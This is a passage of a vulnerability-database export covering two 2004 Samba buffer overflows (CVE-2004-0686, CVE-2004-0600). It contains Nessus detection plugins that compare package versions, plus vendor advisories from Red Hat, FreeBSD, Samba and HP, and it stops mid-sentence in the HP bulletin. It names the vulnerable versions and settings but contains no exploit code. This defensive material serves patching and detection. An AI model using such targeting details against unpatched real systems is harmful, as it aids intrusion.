script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"samba\", pkgver:\"2.2.10\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"samba\", pkgver:\"2.2.10\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"samba\", pkgver:\"2.2.10\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"samba\", pkgver:\"3.0.5\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"samba\", pkgver:\"3.0.5\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:05:19", "description": "Updated samba packages that fix a buffer overflow issue are now\navailable.\n\nSamba provides file and printer sharing services to SMB/CIFS clients.\n\nThe Samba team discovered a buffer overflow in the code used to\nsupport the 'mangling method = hash' smb.conf option. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0686 to this issue.\n\nAll users of Samba should upgrade to these updated packages, which\ncontain an upgrade to Samba-2.2.10, which is not vulnerable to this\nissue.", "edition": 28, "published": "2004-07-26T00:00:00", "title": "RHEL 2.1 : samba (RHSA-2004:404)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686"], "modified": "2004-07-26T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:samba", "p-cpe:/a:redhat:enterprise_linux:samba-common", "p-cpe:/a:redhat:enterprise_linux:samba-client", "p-cpe:/a:redhat:enterprise_linux:samba-swat"], "id": "REDHAT-RHSA-2004-404.NASL", "href": "https://www.tenable.com/plugins/nessus/13846", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:404. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13846);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0686\");\n script_xref(name:\"RHSA\", value:\"2004:404\");\n\n script_name(english:\"RHEL 2.1 : samba (RHSA-2004:404)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix a buffer overflow issue are now\navailable.\n\nSamba provides file and printer sharing services to SMB/CIFS clients.\n\nThe Samba team discovered a buffer overflow in the code used to\nsupport the 'mangling method = hash' smb.conf option. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0686 to this issue.\n\nAll users of Samba should upgrade to these updated packages, which\ncontain an upgrade to Samba-2.2.10, which is not vulnerable to this\nissue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:404\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:404\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"samba-2.2.10-1.21as.1\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"samba-client-2.2.10-1.21as.1\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"samba-common-2.2.10-1.21as.1\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"samba-swat-2.2.10-1.21as.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba / samba-client / samba-common / samba-swat\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-01T06:01:31", "description": "The remote Samba server, according to its version number, is vulnerable \nto a buffer overflow if the option 'mangling method' is set to 'hash' \nin smb.conf (which is not the case by default).\n\nAn attacker may exploit this flaw to execute arbitrary commands on the \nremote host.", "edition": 25, "published": "2004-07-22T00:00:00", "title": "Samba Mangling Method Hash Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:samba:samba"], "id": "SAMBA_MANGLING_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/13657", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13657);\n script_version (\"1.16\");\n\n script_cve_id(\"CVE-2004-0686\");\n script_bugtraq_id(10781);\n\n script_name(english:\"Samba Mangling Method Hash Overflow\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It might be possible to run arbitrary code on the remote server.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote Samba server, according to its version number, is vulnerable \nto a buffer overflow if the option 'mangling method' is set to 'hash' \nin smb.conf (which is not the case by default).\n\nAn attacker may exploit this flaw to execute arbitrary commands on the \nremote host.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/samba-2.2.10.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/samba-3.0.5.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Samba 2.2.10 or 3.0.5\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/22\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2004/07/22\");\n script_cvs_date(\"Date: 2018/07/24 17:29:25\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\nscript_end_attributes();\n\n script_summary(english:\"checks samba version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gain a shell remotely\");\n script_dependencie(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\nif ( get_kb_item(\"CVE-2004-0686\") ) exit(0);\n\nlanman = get_kb_item(\"SMB/NativeLanManager\");\nif(\"Samba\" >< lanman)\n{\n if(ereg(pattern:\"Samba 2\\.2\\.[0-9]$\", string:lanman))\n security_warning(139);\n else if(ereg(pattern:\"Samba 3\\.0\\.[0-4]$\", string:lanman))\n security_warning(139);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-01T06:01:15", "description": "According to its banner, the version of Samba running on the remote\nhost is between 3.0.2 and 3.0.4, inclusive. An error exists in the\nbase64 decoding functions, which can result in a buffer overflow.", "edition": 26, "published": "2011-11-18T00:00:00", "title": "Samba SWAT 3.0.2 - 3.0.4 HTTP Basic Auth base64 Buffer Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0600"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:samba:samba"], "id": "SAMBA_3_0_5.NASL", "href": "https://www.tenable.com/plugins/nessus/17720", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17720);\n script_version (\"1.9\");\n script_cvs_date(\"Date: 2018/11/15 20:50:23\");\n\n script_cve_id(\"CVE-2004-0600\");\n script_bugtraq_id(10780);\n script_xref(name:\"EDB-ID\", value:\"364\");\n\n script_name(english:\"Samba SWAT 3.0.2 - 3.0.4 HTTP Basic Auth base64 Buffer Overflow\");\n script_summary(english:\"Checks version of Samba.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by a buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Samba running on the remote\nhost is between 3.0.2 and 3.0.4, inclusive. An error exists in the\nbase64 decoding functions, which can result in a buffer overflow.\");\n\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.samba.org/samba/history/samba-3.0.5.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2004-0600.html\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nativelanman.nasl\", \"swat_detect.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2)\n exit(1, \"This plugin only runs if 'Report Paranoia' is set to 'Paranoid'.\");\n\nif (!get_kb_item(\"Settings/PCI_DSS\"))\n{\n ports = get_kb_list(\"SWAT/*\");\n if (isnull(ports) || max_index(ports) == 0)\n exit(0, \"SWAT does not appear to be listening on the remote host.\");\n}\n\nport = get_kb_item_or_exit(\"SMB/transport\");\nlanman = get_kb_item_or_exit(\"SMB/NativeLanManager\");\n\n# Ensure the remote server is running Samba 3.0.x.\nif (\"Samba \" >!< lanman)\n exit(0, \"The SMB service listening on port \"+port+\" is not running Samba.\");\n\n# Split and convert third version number to integer.\nversion = lanman - \"Samba \";\nver = split(version, sep:\".\", keep:FALSE);\nver[2] = int(ver[2]);\n\nif (ver[0] == 3 && ver[1] == 0 && (ver[2] >= 2 && ver[2] <= 4))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : 3.0.5' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse exit(0, \"The Samba \"+version+\" install listening on port \"+port+\" is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:14", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "\nEvgeny Demidov discovered that the Samba server has a\n\t buffer overflow in the Samba Web Administration Tool (SWAT)\n\t on decoding Base64 data during HTTP Basic Authentication.\n\t Versions 3.0.2 through 3.0.4 are affected.\nAnother buffer overflow bug has been found in the code\n\t used to support the \"mangling method = hash\" smb.conf\n\t option. The default setting for this parameter is \"mangling\n\t method = hash2\" and therefore not vulnerable. Versions\n\t between 2.2.0 through 2.2.9 and 3.0.0 through 3.0.4 are affected.\n", "edition": 4, "modified": "2008-09-26T00:00:00", "published": "2004-07-14T00:00:00", "id": "2DE14F7A-DAD9-11D8-B59A-00061BC2AD93", "href": "https://vuxml.freebsd.org/freebsd/2de14f7a-dad9-11d8-b59a-00061bc2ad93.html", "title": "Multiple Potential Buffer Overruns in Samba", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:47", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0600", "CVE-2004-0686"], "description": "Samba provides file and printer sharing services to SMB/CIFS clients. \n \nEvgeny Demidov discovered a flaw in the internal routine used by the Samba\nWeb Administration Tool (SWAT) in Samba versions 3.0.2 through 3.0.4. When\ndecoding base-64 data during HTTP basic authentication, an invalid base-64\ncharacter could cause a buffer overflow. If the SWAT administration\nservice is enabled, this flaw could allow an attacker to execute arbitrary\ncode. The Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0600 to this issue.\n\nAdditionally, the Samba team discovered a buffer overflow in the code used\nto support the 'mangling method = hash' smb.conf option. Please be aware\nthat the default setting for this parameter is 'mangling method = hash2'\nand therefore not vulnerable. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CAN-2004-0686 to this issue.\n\nThis release includes the updated upstream version 3.0.4 together with \nbackported security patches to correct these issues as well as a number of\npost-3.0.4 bug fixes from the Samba subversion repository. \n \nThe most important bug fix allows Samba users to change their passwords \nif Microsoft patch KB 828741 (a critical update) had been applied. \n \nAll users of Samba should upgrade to these updated packages, which\nresolve these issues.", "modified": "2017-07-29T20:27:24", "published": "2004-07-22T04:00:00", "id": "RHSA-2004:259", "href": "https://access.redhat.com/errata/RHSA-2004:259", "type": "redhat", "title": "(RHSA-2004:259) samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:53", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0686"], "description": "Samba provides file and printer sharing services to SMB/CIFS clients. \n \nThe Samba team discovered a buffer overflow in the code used to support \nthe 'mangling method = hash' smb.conf option. The Common Vulnerabilities \nand Exposures project (cve.mitre.org) has assigned the name CAN-2004-0686 \nto this issue. \n \nAll users of Samba should upgrade to these updated packages, which \ncontain an upgrade to Samba-2.2.10, which is not vulnerable to this \nissue.", "modified": "2018-03-14T19:27:03", "published": "2004-07-26T04:00:00", "id": "RHSA-2004:404", "href": "https://access.redhat.com/errata/RHSA-2004:404", "type": "redhat", "title": "(RHSA-2004:404) samba security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSummary: Potential Buffer Overruns in Samba 3.0 and Samba 2.2\r\nCVE ID: CAN-2004-0600, CAN-2004-0686\r\n~ &#40;http://cve.mitre.org/&#41;\r\n\r\n- -------------\r\nCAN-2004-0600\r\n- -------------\r\n\r\nAffected Versions: &gt;= v3.0.2\r\n\r\nThe internal routine used by the Samba Web Administration\r\nTool &#40;SWAT v3.0.2 and later&#41; to decode the base64 data\r\nduring HTTP basic authentication is subject to a buffer\r\noverrun caused by an invalid base64 character. It is\r\nrecommended that all Samba v3.0.2 or later installations\r\nrunning SWAT either &#40;a&#41; upgrade to v3.0.5, or &#40;b&#41; disable\r\nthe swat administration service as a temporary workaround.\r\n\r\nThis same code is used internally to decode the\r\nsambaMungedDial attribute value when using the ldapsam\r\npassdb backend. While we do not believe that the base64\r\ndecoding routines used by the ldapsam passdb backend can\r\nbe exploited, sites using an LDAP directory service with\r\nSamba are strongly encouraged to verify that the DIT only\r\nallows write access to sambaSamAccount attributes by a\r\nsufficiently authorized user.\r\n\r\nThe Samba Team would like to heartily thank Evgeny Demidov\r\nfor analyzing and reporting this bug.\r\n\r\n\r\n- -------------\r\nCAN-2004-0686\r\n- -------------\r\n\r\nAffected Versions: &gt;= v2.2.9, &gt;= v3.0.0\r\n\r\n\r\nA buffer overrun has been located in the code used to support\r\nthe &#39;mangling method = hash&#39; smb.conf option. Please be aware\r\nthat the default setting for this parameter in Samba 3 is\r\n&#39;mangling method = hash2&#39; and therefore not vulnerable.\r\n\r\nAffected Samba installations can avoid this possible security\r\nbug by using the hash2 mangling method. Server installations\r\nrequiring the hash mangling method are encouraged to upgrade\r\nto Samba 3.0.5 &#40;or 2.2.10&#41;.\r\n\r\n~ --------------------------------------\r\n\r\n\r\nSamba 3.0.5 and 2.2.10 are identical to the previous release\r\nin each respective series with the exception of fixing these\r\nissues. Samba 3.0.5rc1 has been removed from the download area\r\non Samba.org and 3.0.6rc2 will be available later this week.\r\n\r\n\r\nThe source code can be downloaded from :\r\n\r\n~ http://download.samba.org/samba/ftp/\r\n\r\nThe uncompressed tarball and patch file have been signed\r\nusing GnuPG. The Samba public key is available at\r\n\r\n~ http://download.samba.org/samba/ftp/samba-pubkey.asc\r\n\r\nBinary packages are available at\r\n\r\n~ http://download.samba.org/samba/ftp/Binary_Packages/\r\n\r\nThe release notes are also available on-line at\r\n\r\n~ http://www.samba.org/samba/whatsnew/samba-3.0.5.html\r\n~ http://www.samba.org/samba/whatsnew/samba-2.2.10.html\r\n\r\nOur code, Our bugs, Our responsibility.\r\n&#40;Samba Bugzilla -- https://bugzilla.samba.org/&#41;\r\n\r\n\r\n~ -- The Samba Team\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.4 &#40;GNU/Linux&#41;\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFA/6GdIR7qMdg1EfYRAhGYAJ9wsFUb4+1Nu3shPQn12O5tXQAe1ACgvs6a\r\nHxsnDPYXoL+q5UoYb6/2iJA=\r\n=YCOV\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2004-07-23T00:00:00", "published": "2004-07-23T00:00:00", "id": "SECURITYVULNS:DOC:6530", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6530", "title": "Security Release - Samba 3.0.5 and 2.2.10", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nHP SECURITY BULLETIN\r\n\r\n\r\nHPSBUX01062 REVISION: 0\r\n\r\nSSRT4782 rev. 0 HP-UX CIFS Server potential remote root access\r\n\r\n\r\n -----------------------------------------------------------------\r\nNOTICE:\r\n There are no restrictions for distribution of this Bulletin\r\n provided that it remains complete and intact.\r\n\r\n The information in this Security bulletin should be acted upon\r\n as soon as possible.\r\n\r\nINITIAL RELEASE: 26 July 2004\r\n\r\n\r\n\r\nPOTENTIAL SECURITY IMPACT: remote root access\r\n\r\nSOURCE: HEWLETT-PACKARD COMPANY\r\nHP Software Security Response Team\r\n\r\nREFERENCES: CAN-2004-0686\r\n\r\nVULNERABILITY SUMMARY:\r\nA potential security vulnerability has been identified with HP-UX\r\nrunning the CIFS Server. This buffer overflow could potentially\r\nbe exploited remotely to gain root access.\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP-UX B.11.00, B.11.11, B.11.22, B.11.23.\r\nBACKGROUND:\r\n\r\nAFFECTED VERSIONS\r\n\r\nNote: To determine if a system has an affected version,\r\n search the output of &quot;swlist -a revision -l fileset&quot;\r\n for an affected fileset. Then determine if the\r\n recommended patch or update is installed.\r\n\r\nHP-UX B.11.23\r\nHP-UX B.11.22\r\nHP-UX B.11.11\r\nHP-UX B.11.00\r\n=============\r\nFor revision A.01.11.01 and previous:\r\nCIFS-Server\r\naction: Please see the Resolution section.\r\n\r\nEND AFFECTED VERSIONS\r\n\r\nNote: The HP CIFS Server versions do not map directly to\r\n original Samba versions. The what&#40;1&#41; output will show\r\n the HP version string, for example: A.01.11.02. Samba\r\n commands such as &quot;smbd -V&quot; or &quot;smbstatus&quot; will report the\r\n underlying base Samba version, for example: 2.2.10.\r\n\r\nNote: The HP CIFS Server versions A.01.11.02 and previous are\r\n not affected by the vulnerability reported in CAN-2004-0600.\r\n\r\nRESOLUTION:\r\nUntil an update is available the potential vulnerability can\r\nbe avoided by setting &quot;mangling method = hash2&quot; or\r\n&quot;mangled names = no&quot; in smb.conf.\r\n\r\nNote: CIFS Server installations requiring the hash mangling\r\n method must evaluate the impact of converting to the\r\n hash2 mangling method.\r\n\r\n\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nUntil a product update is available, modify smb.conf as described\r\nin the Resolution section.\r\n\r\nBULLETIN REVISION HISTORY:\r\nRevision 0 - 26 July 2004\r\n Initial release.\r\n\r\n\r\n* The software product category that this Security Bulletin\r\n relates to is represented by the 5th and 6th characters of the\r\n Bulletin number: GN=General, MA=Management Agents, MI=Misc.\r\n 3rd party, MP=HP-MPE/iX, NS=HP NonStop Servers, OV=HP OpenVMS,\r\n PI=HP Printing & Imaging, ST=HP Storage, TU=HP Tru64 UNIX,\r\n TL=Trusted Linux, UX=HP-UX, VV=Virtual Vault\r\n\r\n\r\nSUPPORT: For further information, contact HP Services support\r\n channel.\r\n\r\nSUBSCRIBE: To initiate a subscription to receive future HP\r\nSecurity Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode\r\n=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page:\r\nDriver and Support Alerts/Notifications Sign-up: Product Selection\r\nUnder Step1: your products\r\n1. Select product category:\r\n - a minimum of servers must be selected.\r\n2. Select product family or search:\r\n - a minimum of one product must be selected.\r\n3. Add a product:\r\n - a minimum of one product must be added.\r\nIn Step 2: your operating system&#40;s&#41;\r\n - check ALL operating systems for which alerts are required.\r\nComplete the form and Save.\r\n\r\nTo update an existing subscription:\r\nhttp://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page Subscriber&#39;s choice for Business: sign-in.\r\nOn the Web page: Subscriber&#39;s Choice: your profile summary\r\n- - use Edit Profile to update appropriate sections.\r\n\r\nNote: In addition to the individual alerts/notifications for the\r\nselected operating systems/products, subscribers will\r\nautomatically receive one copy of alerts for non-operating system\r\ncategories &#40;i.e., a subscriber who signs up for all six operating\r\nsystem alerts will only receive one copy of all the non-operating\r\nsystem alerts&#41;.\r\n\r\nHP-UX SPECIFIC SECURITY BULLETINS*:\r\nTo review previously published Security Bulletins for HP-UX:\r\n http://itrc.hp.com/cki/bin/doc.pl/screen=ckiSecurityBulletin\r\n\r\nSecurity Patch Check revision B.02.00 analyzes all HP-issued\r\nsecurity bulletins to give you a subset of recommended actions\r\nthat potentially affect your particular HP-UX system.\r\nFor more information:\r\n&lt;http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/\r\n displayProductInfo.pl?productNumber=B6834AA&gt;\r\n\r\n\r\nREPORT: To report a potential security vulnerability with any HP\r\nsupported product, send Email to: security-alert@hp.com. It is\r\nstrongly recommended that security related information being\r\ncommunicated to HP be encrypted using PGP, especially exploit\r\ninformation. To obtain the security-alert PGP key please send an\r\ne-mail message to security-alert@hp.com with the Subject of\r\n&#39;get key&#39; &#40;no quotes&#41;.\r\n\r\nSystem management and security procedures must be reviewed\r\nfrequently to maintain system integrity. HP is continually\r\nreviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n&quot;HP is broadly distributing this Security Bulletin in order to\r\nbring to the attention of users of the affected HP products the\r\nimportant security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this\r\ninformation to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily\r\naccurate or complete for all user situations and, consequently,\r\nHP will not be responsible for any damages resulting from user&#39;s\r\nuse or disregard of the information provided in this Bulletin.\r\nTo the extent permitted by law, HP disclaims all warranties,\r\neither express or implied, including the warranties of\r\nmerchantability and fitness for a particular purpose, title\r\nand non-infringement.&quot;\r\n\r\n\r\n&#40;c&#41;Copyright 2004 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or\r\neditorial errors or omissions contained herein. The information\r\nprovided is provided &quot;as is&quot; without warranty of any kind. To the\r\nextent permitted by law, neither HP or its affiliates,\r\nsubcontractors or suppliers will be liable for incidental, special\r\nor consequential damages 